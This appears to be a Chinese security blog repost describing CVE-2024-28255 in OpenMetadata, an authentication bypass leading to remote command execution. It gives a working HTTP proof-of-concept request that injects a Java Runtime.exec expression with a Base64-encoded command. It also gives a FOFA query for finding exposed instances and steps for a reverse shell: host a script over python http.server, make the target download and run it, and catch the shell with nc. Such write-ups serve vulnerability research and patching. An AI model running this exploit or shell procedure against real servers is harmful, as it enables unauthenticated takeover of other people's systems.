Ⅰ、产品简介
OpenMetadata是一个统一的发现、可观察和治理平台,由中央 元数据存储Q 库、深入的沿袭和无缝团队协作提供支持。
Ⅱ、漏洞描述
OpenMetadata存在 安全漏洞Q,该漏洞源于当请求的路径包含任何排除的端点时,过滤器将返回而不验证JWT。导致未经身份验证的远程攻击者可以利用该漏洞远程命令执行,获取服务器权限。
Ⅲ、影响范围
version < 1.2.4
Ⅳ、复现环境
FOFA: icon_hash="733091897"
V、漏洞复现
POC
GET /api/v1;v1%2fusers%2flogin/events/subscriptions/validation/condition/T(java.lang.Runtime).getRuntime().exec(new%20java.lang.String(T(java.util.Base64).getDecoder().decode(%22Base64编码的命令%22))) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Connection: close
注意:执行的命令需要base64
反弹shell
估计只有我讲的最直接了
先把python http开启
python -m http.server 8823
注意:要在开启服务当前目录下准备好1.sh的bash文件
1.sh内容
直接远程命令执行下载
在服务器上开启nc监听
然后直接运行sh文件
我们发现直接可以拿shell
从漏洞复现到远控或者其他的手法利用,不可能就是单一的,一定是千变万化了
原文始发于微信公众号(暗影网安实验室):OpenMetadata 命令执行漏洞复现(CVE-2024-28255)|自带工具和拿shell
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论